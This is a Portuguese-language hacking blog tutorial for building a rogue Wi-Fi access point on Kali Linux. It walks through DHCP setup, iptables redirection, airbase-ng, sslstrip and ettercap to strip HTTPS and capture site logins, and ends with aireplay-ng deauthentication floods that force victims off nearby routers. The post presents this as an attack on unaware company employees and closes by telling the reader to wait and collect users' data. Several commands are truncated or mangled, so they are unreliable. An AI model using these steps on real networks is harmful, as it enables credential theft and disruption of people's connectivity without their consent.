capturar site Logins




Criando manualmente um AP falsificado para capturar site Logins

KALI-LINUX-FAKE-AP-HACK-WEBSITE-LOGINS- picateshackz.com

Nós vamos ser a criação de um ponto de acesso falso onde estaremos tirando a criptografia de sites usando HTTPS para HTTP para que possamos pegar as entradas dos campos username e password. Nós também estaremos enviando pacotes deauthentication para todos os outros roteadores nas proximidades tornando-os inúteis e forçar o usuário para fazer login no nosso ponto de acesso malicioso. Isso pode ser facilmente usado para ataques conhecidos como "ataques charco", onde atacam uma empresa onde os funcionários nem sequer percebem que eles estão em um ponto de acesso malicioso porque automaticamente conectado à um malicioso devido aos outros sendo desligamento.
Nota: Sim, eu percebo alguns sites estão utilizando TLS, por isso não vai ser capaz de capturar os logins desses sites, infelizmente, como o mecanismo de criptografia não será descriptografado. (se você sabe uma maneira de retirar a encriptação, por favor me diga!)

Requisitos e Lab:

  • Um adaptador de rede que suporta o modo de injeção de pacote, o modo de monitor e master.
  • A exposição ao ambiente Linux e uma quantidade razoável de experiência penetração wireless, 
  • Um cérebro funcional que pode processar informações.

Passo 1: Obtenha nosso gateway padrão

Abra o terminal de Kali e Linux Você pode fazer isso digitando:


route -n
Sob onde diz "Gateway", você vai precisar para memorizá-la ou escrevê-lo como nós vamos precisar usá-lo quando estabelecemos as nossas tabelas de IP mais tarde.
Passo 2: Agora vamos instalar dhcp3-server Em primeiro lugar, se você não tiver feito isso, digite:



apt-get dist-upgrade Quando isso é feito, agora vamos instalar o servidor DHCP, digitando:



apt-get install dhcp3-server Agora, quando se faz a instalação, é preciso configurar o servidor DHCP, digitando:



nano /etc/dhcpd.conf Agora, copie e cole o seguinte em:
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
A única coisa que você precisa entender aqui é a linha de nome de domínio Opção, onde diz "FreeWiFi", você pode mudar isso para o que você quiser chamar seu falso (e mal-intencionado) ponto de acesso. Para este tutorial, eu vou mantê-lo como FreeWiFi.
Agora, apenas a ressalva de que, digitando CTRL + X e Y, em seguida, em seguida, digite.
Passo 3: Agora vamos começar modo de monitor
Para começar o modo monitor, tipo:



airmon-ng start Então, para tentar evitar quaisquer problemas, digite:



airmon-ng check killPasso 4: Comece o ponto de acesso falso
Agora que você tem modo monitor tudo pronto, agora vamos começar o ponto de acesso falso:



airbase-ng -c 11 -e Agora que você começou a AP falso, no entanto, se você tentar acessá-lo, você não será capaz de fazer. Lembre-se de não fechar esse terminal como você precisa estar on-line.
Passo 5: Agora vamos definir as regras de mesa IP
Há um monte de comandos aqui, então eu sugiro a criação de um shell script, e isso é como fazê-lo, primeiro tipo:
nano iptables.sh Agora supondo que você tenha conhecimentos básicos de networking, eu suponho que você vai ler sobre isso e configurar manualmente algumas delas como alguns pode não funcionar para você.



#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to
iptables –P FORWARD ACCEPT
iptables --append FORWARD –-in-interface at0 –j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000
Em seguida, dar-lhe permissões, digitando:
chmod +x iptables.sh Em seguida, basta executá-lo digitando:
./iptables.shPasso 6: Iniciar o servidor DHCP
Para fazer isso, basta digitar:
dhcpd –cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0 Em seguida, para iniciá-lo, digite:
/etc/init.d/isc-dhcp-server startPasso 7: A partir sslstrip e Ettercap
Eu suponho que você sabe o que essas duas ferramentas estão fazendo, então vamos começar de iniciando sslstrip:
sslstrip –f –p –k 10000 Deixe que o terminal aberto. Então, para começar a ettercap, digite:
ettercap –p –u –T –q –I at0Passo 8: Envio de pacotes deauth para todos os outros roteadores
airodump-ng Em seguida, selecione o seu alvo e anote o seu número de canal (s) e BSSID (s). Em seguida, defina os canais, digitando:
iwconfig channel Agora, para começar o ataque deauthentication, digite o seguinte comando:
aireplay-ng -0 5000 -a --ignore-negative-one Parabéns, você está feito, agora é só sentar e esperar que os usuários façam login e reunir seus dados.
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...